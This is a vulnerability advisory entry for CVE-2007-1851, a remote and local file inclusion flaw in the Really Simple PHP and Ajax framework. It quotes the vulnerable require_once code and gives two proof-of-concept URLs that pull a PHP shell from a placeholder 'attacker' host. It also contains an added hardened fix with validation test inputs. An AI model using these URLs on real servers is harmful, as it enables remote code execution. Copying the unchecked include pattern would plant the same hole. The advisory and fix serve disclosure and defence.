Really Simple PHP and Ajax Multiple Directory Traversal Vulnerabilities

Vulnerability ID: 1112610    Vulnerability type: Path traversal
Published: 2007-04-02    Updated: 2007-04-03
CVE ID: CVE-2007-1851    CNNVD-ID: CNNVD-200704-059
Platform: PHP    CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/3641
https://www.securityfocus.com/bid/86372
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-059
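|Vulnerability Details
Multiple directory traversal vulnerabilities exist in Really Simple PHP and Ajax (RSPA) 2007-03-23. Remote attackers can include and execute arbitrary local files via a .. in the __class parameter submitted to (1) Controller_v4.php or (2) Controller_v5.php.
|Vulnerability Exploit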
RSPA Remote File Inclusion

Really Simple PHP and Ajax (RSPA)
RSPA is a component-based, event-driven, Ajax-enabled framework for PHP 4 and PHP 5. It is a combination of plain PHP classes and HTML/JavaScript. RSPA allows calling server-side PHP functions from client JavaScript events. Visit http://rspa.sourceforge.net

Credit:
The information has been provided by Hamid Ebadi.
The original article can be found at: http://www.bugtraq.ir

http://www.bugtraq.ir/articles/advisory/RSPA_File_Inclusion/6

Vulnerable Systems:
Version: rspa-2007-03-23

Description:
Input passed to the "__IncludeFilePHPClass", "__ClassPath" and "__class" parameters in "rspa/framework/Controller_v5.php" and "rspa/framework/Controller_v4.php" is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.


Read more about file inclusion at http://www.bugtraq.ir/articles

Vulnerable Code:
require_once("rspaconf.inc.php");

$className = $_REQUEST['__class'];
$methordName = $_REQUEST['__methord'];

// IncludeFile for PHP Class
// (the request value is passed to require_once unchecked)
if ($_REQUEST['__IncludeFilePHPClass']) {
    $filename = $_REQUEST['__IncludeFilePHPClass'];
    require_once($filename);
}

// Parms
if (isset($_REQUEST['__parameters'])) {
    $parameter = getParms($_REQUEST['__parameters']);
} else {
    $parameter = "";
}

// ClassFile + ClassPath
// (__ClassPath and __class are concatenated into the include path unchecked)
include("../components/Form.class.php");
if ($_REQUEST["__ClassPath"] == "null" || empty($_REQUEST["__ClassPath"])) {
    $filename = $RSPA['class_folder'] . $className . $RSPA['class_extension'];
} else {
    $filename = $_REQUEST["__ClassPath"] . $className . $RSPA['class_extension'];
}
require_once($filename);



PoC exploit:
The following URLs cause remote file inclusion:

http://[HOST]/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=http://attacker/phpshell.txt/?
http://[HOST]/rspa/framework/Controller_v4.php?__ClassPath=http://attacker/phpshell.txt/?

# copyright : http://www.bugtraq.ir

# milw0rm.com [2007-04-02]
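
A hardened form of the class-file lookup from the vulnerable code above, as an added example that is not part of the advisory or of RSPA. The function name rspa_safe_class_file, the PHP 7+ syntax and the sample inputs are assumptions; the client-supplied __IncludeFilePHPClass and __ClassPath are dropped entirely, and the folder and extension come from server configuration only.

```php
<?php
// Added example (not RSPA code): resolve a class file without trusting request data.
// Assumptions: PHP 7+, classes live directly in one folder, names are plain identifiers.

function rspa_safe_class_file(string $className, string $classFolder, string $extension): string
{
    // Allowlist: a PHP identifier only. Rejects "..", "/", "\", ":", NUL and URL schemes.
    if (!preg_match('/\A[A-Za-z_][A-Za-z0-9_]{0,63}\z/', $className)) {
        throw new InvalidArgumentException('invalid class name');
    }

    $base = realpath($classFolder);
    if ($base === false) {
        throw new RuntimeException('class folder missing');
    }

    // realpath() resolves symlinks and returns false for nonexistent files.
    $path = realpath($base . DIRECTORY_SEPARATOR . $className . $extension);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('class file not found in class folder');
    }
    return $path;
}

// Self-check with constructed inputs: a temp folder holding one class file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rspa_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/Hello.class.php', "<?php class Hello {}\n");

// Constructed request values: one valid name, then values that must be rejected.
$inputs = ['Hello', '../../etc/passwd', 'http://example.invalid/x.txt?', "Hello\0", 'Missing'];
foreach ($inputs as $in) {
    try {
        $file = rspa_safe_class_file($in, $dir, '.class.php');
        require_once $file;               // only reached for validated, contained paths
        echo "OK      ", basename($file), "\n";
    } catch (Exception $e) {
        echo "REJECT  ", json_encode($in), " (", $e->getMessage(), ")\n";
    }
}
unlink($dir . '/Hello.class.php');
rmdir($dir);
```

Setting allow_url_include = Off in php.ini (the default since PHP 5.2) is a second layer against the remote-inclusion case.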
|Affected Products
Really Simple Php And Ajax Really Simple Php And Ajax 2007-03-23
|References

Source: MILW0RM
Name: 3641
Link: http://www.milw0rm.com/exploits/3641
Source: VUPEN
Name: ADV-2007-1190
Link: http://www.frsirt.com/english/advisories/2007/1190
Source: MISC
Link: http://www.bugtraq.ir/articles/advisory/RSPA_File_Inclusion/6
Source: SECUNIA
Name: 24671
Link: http://secunia.com/advisories/24671
Source: XF
Name: rspa-class-file-include(33357)
Link: http://xforce.iss.net/xforce/xfdb/33357